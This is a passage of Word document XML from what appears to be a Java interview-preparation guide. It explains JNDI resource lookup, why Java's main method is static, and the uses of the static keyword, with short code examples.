          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the desired JNDI resource using the lookup() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766BCC6F" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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ast the looked-up object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the appropriate type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208EAD4C" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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the resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., sending/receiving messages, interacting with a database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9AF08A" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F35A2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4E1A34B">
          <v:rect id="_x0000_i1212" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A8CE2" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2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52CBC77E" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A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NDI is a powerful Java API that allows you to access a variety of resources like databases, message queues, EJBs, etc., in a flexible and standardized way. The process involves setting up a context, performing a lookup, and using the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58869DE8" w14:textId="37799659"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B65B264">
          <v:rect id="_x0000_i1213" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7738BA" w14:textId="102B1155" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc196307549"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why is the main method in java static</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="1A44CD91" w14:textId="58EF64C2" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B2566">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main method in Java is defined as static for several important reasons, all related to the way Java programs are executed. Here's why it's static:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F0220" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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Entry Point for Program Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75516648" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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main method serves as the entry point for the Java program when it is executed. When a Java application starts, the Java Virtual Machine (JVM) calls the main method to begin execution. Since the main method is static, it can be called without creating an instance of the class. The JVM doesn't need to create an object of the class to start running the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECDBE22" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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4604006F" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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22917340" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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40FF1852" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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Hello, World!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1554D2DD" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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22A304A" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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78B7613" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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 the JVM can directly invoke Main.main() without needing to instantiate the Main class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3DA606" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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No Object Instantiation Required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0416F5F9" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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tatic keyword means that the method belongs to the class rather than to an instance of the class. Since the main method is the starting point of the program, it is called by the JVM before any objects are created, so it cannot rely on instance-level variables or methods that require an object to be instantiated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE6F100" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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main method were not static, the JVM would have to instantiate the class (i.e., create an object) first before calling the method. This would introduce unnecessary complexity and prevent the program from starting without object instantiation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B878E5" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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Consistency Across the Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1502D89D" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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ving a static main method ensures that there is a consistent way for the JVM to start any Java application. The main method signature is always public static void main(String[] args), and it's universally recognized as the entry point, which makes Java programs predictable and standard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293CB655" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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Allows Access to Command-Line Arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192BB6AB" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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The main method allows passing command-line arguments through its parameter String[] args. Since it's static, the JVM can directly pass the command-line arguments to the method without needing an instance of the class to be created first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B8527" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003B256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A625ADE">
          <v:rect id="_x0000_i1214" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E000A7F" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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629FA877" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B2566">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows the JVM to call the method without creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220EC0AA" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B2566">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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main method is the entry point for program execution, and static ensures it is available for execution before any objects are created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B01EEA9" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B2566">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in how Java programs are started and allows for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>passing of command-line arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D8604" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B2566">
      <w:pPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In essence, making the main method static enables the JVM to invoke it directly without the need for an object instantiation, which simplifies the process of program startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26248A2B" w14:textId="35575FE5"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BFC9E72">
          <v:rect id="_x0000_i1215" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D4603" w14:textId="0B37DA45" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc196307550"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of the static keyword</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="463FDCB4" w14:textId="16675727" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">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tatic keyword in Java is used to declare members (variables, methods, blocks, or inner classes) that belong to the class rather than to instances of the class. This means that static members are shared among all instances of the class. Here are the main uses and benefits of the static keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B02C83A" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C5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Static Variables (Class Variables)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C8080D"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static variable is shared among all instances of the class. It is not tied to a specific object, but rather to the class itself. Every object of the class shares the same static variable. Static variables are used when you want to have a common property for all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9B04B"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581CF15B"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Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69640E2B"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atic int count = 0;  // Static variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8066DB" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF6B43A"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Counter() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396CF8A7"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unt++;  // Increment count whenever a new object is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BE182"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556EC9A"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2BFA883" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB077E3"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55F4388C"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152A4115"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new Counter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110F7D87"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new Counter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4F4EAE"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ounter.count);  // Output: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8A2A3F"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283A634"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F8BE159"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 count is a static variable, and it keeps track of how many instances of the Counter class are created. The value is shared across all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2450DF9C" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C5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Static Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F3A10"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static method can be called on the class itself, rather than on instances of the class. Static methods can only access static variables and other static methods. They cannot access instance variables or methods because they don't have an object context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70836235"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7B5B88C1"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Calculator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A5DE9"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atic int add(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A11689F"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a + b;  // Static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E75F5A"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F41B887"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750F769" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68304990"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1F831206"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02573B90"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result = Calculator.add(5, 3);  // Calling static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794AC72"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result);  // Output: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA886E7"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54C3591"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AFD9DC"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 the add method is static, so it can be called using the class name, without creating an instance of the Calculator class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6045B31F" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C5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Static Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5A32C"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tic blocks are used for initialization of static variables or performing setup tasks when the class is loaded into memory. A static block is executed only once when the class is first loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681B2F1"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58BA8704"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Demo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA7887"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atic {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064E7EE1"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tatic block executed.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C663B2F"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8F92B74"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A04CF85" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4599D4A4"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397F81AD"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6B9EAB7A"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new Demo();  // Static block will be executed the first time the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41255B29"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12706D7"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13E42DD"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 the static block is executed once when the class Demo is loaded into memory, before any objects are created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C98138B" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C5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Static Classes (Nested Classes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61328D9E"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static inner class is a nested class that is associated with its outer class, but it does not require an instance of the outer class to be instantiated. It can only access static members of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6FC33B"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39A1B0A9"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OuterClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B03118C"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atic int num = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC4ECA6" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B7460B"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atic class InnerClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6206CE24"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display() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F131F"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Value of num: " + num);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D5025"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6688B02"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3A9B753"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0EABEB3" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A2A0D0"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31FFFF7D"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44F93387"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uterClass.InnerClass inner = new OuterClass.InnerClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273AA912"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ner.display();  // Output: Value of num: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074E804"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FF59813"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BD7FAB4"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 InnerClass is a static nested class, and it can be instantiated without an instance of the OuterClass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B99126" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C5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Static Import</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55023CC4"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tatic keyword can also be used to import static members (variables or methods) of a class directly into your code, allowing you to use them without qualifying with the class name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1FC80"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65A09769"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static java.lang.Math.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD79F9" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379D35B3"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2521F19D"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223EE8DB"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ouble result = sqrt(16);  // No need to use Math.sqrt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6277E4B6"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result);  // Output: 4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8DFB13"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DE5E363"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75144D9"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 sqrt is imported statically, so it can be used without referencing the Math class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB2AA5" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C5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Static vs Instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042FF8C7" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> belong to the class itself and are shared among all instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F678EEF" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Instance members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> belong to individual objects and are specific to each object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E339D9" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C5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 of Uses of static Keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622EF732" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shared by all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECE304E" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can be called without creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071FE37A" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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Blocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used for class initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D666934" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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Nested Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Do not require an instance of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDEDE57" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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Import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows importing static members for direct access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D045930" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C5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Benefits of static Keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADE7F60" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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efficiency</w:t>
      </w:r>
